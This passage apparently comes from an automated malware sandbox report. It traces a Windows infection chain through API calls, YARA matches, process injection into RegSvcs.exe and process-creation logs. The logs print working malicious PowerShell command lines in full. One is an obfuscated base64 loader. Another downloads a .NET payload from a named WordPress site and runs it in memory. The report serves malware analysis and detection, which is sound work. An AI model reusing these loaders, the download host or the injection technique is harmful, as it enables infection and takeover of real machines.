                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00412077 GetProcessHeap,HeapFree,27_2_00412077
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_004349F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00434B47 SetUnhandledExceptionFilter,27_2_00434B47
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0043BB22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00434FDC

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match | File source: amsi64_6916.amsi.csv, type: OTHER
                        Source: Yara match | File source: amsi64_7924.amsi.csv, type: OTHER
                        Source: Yara match | File source: amsi64_7728.amsi.csv, type: OTHER
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: 3.2.powershell.exe.29b32a30000.5.raw.unpack, MXuuJb.cs | Reference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
                        Source: 3.2.powershell.exe.29b32a30000.5.raw.unpack, MXuuJb.cs | Reference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
                        Source: 3.2.powershell.exe.29b32a30000.5.raw.unpack, MXuuJb.cs | Reference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: ED4008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 703008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 240008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 27_2_004120F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00419627 mouse_event | 27_2_00419627
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\desktop\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager8O\0
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                        Source: RegSvcs.exe, 00000008.00000002.3324391807.000000000128A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerlWindowsPowerShell\v1.0\PowerShell.exeE
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager6be
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager8O\+
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager2w9
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerawJ
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager8O\9
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001257000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager=
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager8O\
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.dr Binary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_00434C52 cpuid 27_2_00434C52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: EnumSystemLocalesW,27_2_00452036
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_004520C3
